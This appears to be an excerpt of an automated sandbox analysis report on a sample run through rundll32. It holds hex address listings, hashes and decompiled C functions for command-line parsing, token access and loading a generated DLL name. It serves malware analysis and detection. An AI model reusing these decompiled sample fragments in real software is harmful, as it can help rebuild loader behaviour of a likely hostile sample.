                                                                      0x04954f18
                                                                      0x04954f18
                                                                      0x04954f1a
                                                                      0x04954f21
                                                                      0x04954f21
                                                                      0x04954f23
                                                                      0x04954f25
                                                                      0x04954f27
                                                                      0x04954f2b
                                                                      0x04954f2d
                                                                      0x04954f2f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x04954f2f
                                                                      0x04954f2b
                                                                      0x04954f1c
                                                                      0x04954f1c
                                                                      0x04954f1f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x04954f1f
                                                                      0x04954f1a
                                                                      0x04954f77
                                                                      0x04954f79
                                                                      0x04954f79
                                                                      0x04954f84
                                                                      0x04954e27
                                                                      0x04954e27
                                                                      0x04954e2a
                                                                      0x00000000
                                                                      0x04954e2c
                                                                      0x04954e2c
                                                                      0x04954e2e
                                                                      0x04954e32
                                                                      0x00000000
                                                                      0x04954e34
                                                                      0x04954e34
                                                                      0x04954e34
                                                                      0x04954e37
                                                                      0x00000000
                                                                      0x04954e3b
                                                                      0x04954e44
                                                                      0x04954e44
                                                                      0x04954e37
                                                                      0x04954e32
                                                                      0x04954e2a
                                                                      0x04954e16
                                                                      0x04954e1f
                                                                      0x04954e1f

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID:
                                                                      • API String ID: 3510742995-0
                                                                      • Opcode ID: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
                                                                      • Instruction ID: c508c99a67074788f19657723a9f742087c0c67ca3a272c4acb405c3f0786a2d
                                                                      • Opcode Fuzzy Hash: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
                                                                      • Instruction Fuzzy Hash: 73D10375600600AFDB64CF6DD9C4A6AB7E5FF88304B24897DE88ACB721D731F9848B54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1a75496f1efb5c191d428df92e40a50d38fb096c5dc734c531708c1a65280a27
                                                                      • Instruction ID: 6bf5f4feb100cd708656c96652e92a6bf95a02e9ba994d6458048b999b1193c1
                                                                      • Opcode Fuzzy Hash: 1a75496f1efb5c191d428df92e40a50d38fb096c5dc734c531708c1a65280a27
                                                                      • Instruction Fuzzy Hash: 5B316F35A10008ABDB24DAA4C8BCAFE7BF6AB55304F5441D9E7816B340F2317AC2D7D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0494B947(intOrPtr __ecx) {
                                                                      				int _v8;
                                                                      				signed int _v12;
                                                                      				intOrPtr _v16;
                                                                      				short* _v140;
                                                                      				intOrPtr _v144;
                                                                      				short _v664;
                                                                      				signed int _t28;
                                                                      				signed int _t29;
                                                                      				signed int _t30;
                                                                      				int _t40;
                                                                      				signed int _t41;
                                                                      				int _t44;
                                                                      				signed int _t45;
                                                                      				WCHAR* _t52;
                                                                      				signed int _t54;
                                                                      				short* _t55;
                                                                      				void* _t56;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_v16 = __ecx;
                                                                      				_t54 = 0;
                                                                      				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                      				_t44 = _v8;
                                                                      				_t41 = 0;
                                                                      				_v12 = _t28;
                                                                      				if(_t44 <= 0) {
                                                                      					L22:
                                                                      					_t29 = _t28 | 0xffffffff;
                                                                      					__eflags = _t29;
                                                                      					return _t29;
                                                                      				} else {
                                                                      					goto L1;
                                                                      				}
                                                                      				do {
                                                                      					L1:
                                                                      					_t52 =  *(_t28 + _t41 * 4);
                                                                      					_t30 =  *_t52 & 0x0000ffff;
                                                                      					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
                                                                      						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
                                                                      						_t40 = lstrlenW(_t52);
                                                                      						_t45 = 0;
                                                                      						if(_t40 <= 0) {
                                                                      							L11:
                                                                      							_t44 = _v8;
                                                                      							_t54 = _t54 + 1;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L8;
                                                                      						}
                                                                      						do {
                                                                      							L8:
                                                                      							if(_t52[_t45] == 0x2c) {
                                                                      								_t52[_t45] = 0;
                                                                      							}
                                                                      							_t45 = _t45 + 1;
                                                                      						} while (_t45 < _t40);
                                                                      						goto L11;
                                                                      					}
                                                                      					L12:
                                                                      					_t28 = _v12;
                                                                      					_t41 = _t41 + 1;
                                                                      				} while (_t41 < _t44);
                                                                      				if(_t54 != 1) {
                                                                      					if(__eflags <= 0) {
                                                                      						goto L22;
                                                                      					}
                                                                      					_t55 = _v140;
                                                                      					L17:
                                                                      					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
                                                                      						E0494C145(_v16, _t55, 0x104);
                                                                      					} else {
                                                                      						GetCurrentDirectoryW(0x104,  &_v664);
                                                                      						_push(0);
                                                                      						_push(_t55);
                                                                      						_push("\\");
                                                                      						_v12 = E04949924( &_v664);
                                                                      						E0494C145(_v16, _t36, 0x104);
                                                                      						E0494913B( &_v12, 0xfffffffe);
                                                                      					}
                                                                      					return 0;
                                                                      				}
                                                                      				_t55 = _v144;
                                                                      				goto L17;
                                                                      			}




















                                                                      0x00000000
                                                                      0x0494ba4a
                                                                      0x0494b9d8
                                                                      0x00000000

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 0494B95C
                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0494B967
                                                                      • lstrlenW.KERNEL32(00000000), ref: 0494B9A9
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0494BA02
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CommandLine$ArgvCurrentDirectorylstrlen
                                                                      • String ID:
                                                                      • API String ID: 159791187-0
                                                                      • Opcode ID: d7b43918f86b96083c8b0fe03adbf6b0033fba56821a7f560063e86af3058dc3
                                                                      • Instruction ID: f9acb4bf5c65e4b72caa321ed8be77fa79af63d7e515cc67f654de24e6e057c7
                                                                      • Opcode Fuzzy Hash: d7b43918f86b96083c8b0fe03adbf6b0033fba56821a7f560063e86af3058dc3
                                                                      • Instruction Fuzzy Hash: 0131B371D00119ABDB289FA9C894EAEB7BDEFC5318F204579D842E3191EB70F9818B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0494DB58(void* __ecx) {
                                                                      				void* _v8;
                                                                      				void* _t10;
                                                                      				intOrPtr _t13;
                                                                      
                                                                      				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                      					L4:
                                                                      					_t10 = _v8;
                                                                      				} else {
                                                                      					if(GetLastError() != 0x3f0) {
                                                                      						L3:
                                                                      						_t10 = 0;
                                                                      					} else {
                                                                      						_t13 =  *0x4960fa0; // 0x49ff8a0
                                                                      						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							goto L3;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t10;
                                                                      			}







                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 0494DB6B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB72
                                                                      • GetLastError.KERNEL32(?,?,0494DC9D,00000000,04940000), ref: 0494DB79
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB9E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1515895013-0
                                                                      • Opcode ID: f198bdbef088f27ef8973dedb4f88b22fd592f2cc49aef898049d7e16844ae02
                                                                      • Instruction ID: 31a37798a5d18e8c3b5ae6c3dd7a943a810ee514382d427998e7dab3a2856807
                                                                      • Opcode Fuzzy Hash: f198bdbef088f27ef8973dedb4f88b22fd592f2cc49aef898049d7e16844ae02
                                                                      • Instruction Fuzzy Hash: 85F03A75654205EFEB80ABA4D849FAA7BECFB84200F144678E602D7150E668BE009B20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0494A222(void* __ecx, void* __edx) {
                                                                      				WCHAR* _v8;
                                                                      				char _v12;
                                                                      				char _v140;
                                                                      				WCHAR* _t12;
                                                                      				intOrPtr _t17;
                                                                      				void* _t22;
                                                                      				intOrPtr _t23;
                                                                      				intOrPtr _t29;
                                                                      				intOrPtr _t32;
                                                                      				void* _t43;
                                                                      				void* _t54;
                                                                      				WCHAR* _t55;
                                                                      				char* _t56;
                                                                      				WCHAR* _t57;
                                                                      				intOrPtr _t58;
                                                                      				char _t60;
                                                                      				struct HINSTANCE__* _t61;
                                                                      
                                                                      				_t43 = 0;
                                                                      				_t12 = E049490EA(__ecx, 0x152a);
                                                                      				_t58 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t55 = _t12;
                                                                      				_t59 = _t58 + 0xb0;
                                                                      				_v8 = _t55;
                                                                      				E0494C08E( &_v140, 0x40, L"%08x", E0494E605(_t59, E0494CE25(_t58 + 0xb0), 0));
                                                                      				_t17 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t3 = _t17 + 0xa8; // 0x1
                                                                      				asm("sbb eax, eax");
                                                                      				_t22 = E049490EA(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
                                                                      				_t56 = "\\";
                                                                      				_t23 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t60 = E04949924(_t23 + 0x1020);
                                                                      				_v12 = _t60;
                                                                      				E04949D66( &_v8);
                                                                      				_t29 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t57 = E04949924(_t29 + 0x122a);
                                                                      				_t32 =  *0x4960fa0; // 0x49ff8a0
                                                                      				_v8 = _t57;
                                                                      				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
                                                                      				_t61 = LoadLibraryW(_t57);
                                                                      				if(_t61 != 0) {
                                                                      					_push(_t61);
                                                                      					_t54 = 0x3c;
                                                                      					_t43 = E04949446(0x495d9bc, _t54);
                                                                      				}
                                                                      				E0494913B( &_v12, 0xfffffffe);
                                                                      				E049492A2( &_v140, 0, 0x80);
                                                                      				if(_t43 != 0) {
                                                                      					 *0x49610ac = _t61;
                                                                      					 *0x49610b4 = _t57;
                                                                      				} else {
                                                                      					E0494913B( &_v8, 0xfffffffe);
                                                                      				}
                                                                      				return _t43;
                                                                      			}





















                                                                      APIs
                                                                        • Part of subcall function 0494C08E: _vsnwprintf.MSVCRT ref: 0494C0AB
                                                                        • Part of subcall function 04949924: lstrcatW.KERNEL32(00000000,?), ref: 04949963
                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 0494A2F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_vsnwprintflstrcat
                                                                      • String ID: %08x$dll
                                                                      • API String ID: 1445519121-2963171978
                                                                      • Opcode ID: 2ba58d10322c1d1795cfce52700b006374c3105eb1738389ac141fb78479b543
                                                                      • Instruction ID: 69cc52d13545eb006dc8726c1439aceccfbab89e53df89ace8d4473c0483cc2d
                                                                      • Opcode Fuzzy Hash: 2ba58d10322c1d1795cfce52700b006374c3105eb1738389ac141fb78479b543
                                                                      • Instruction Fuzzy Hash: B831A7B2A44214BBEB20E675DC45F9F37ACDBC9714F108179F504E72C0EA78AD458760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%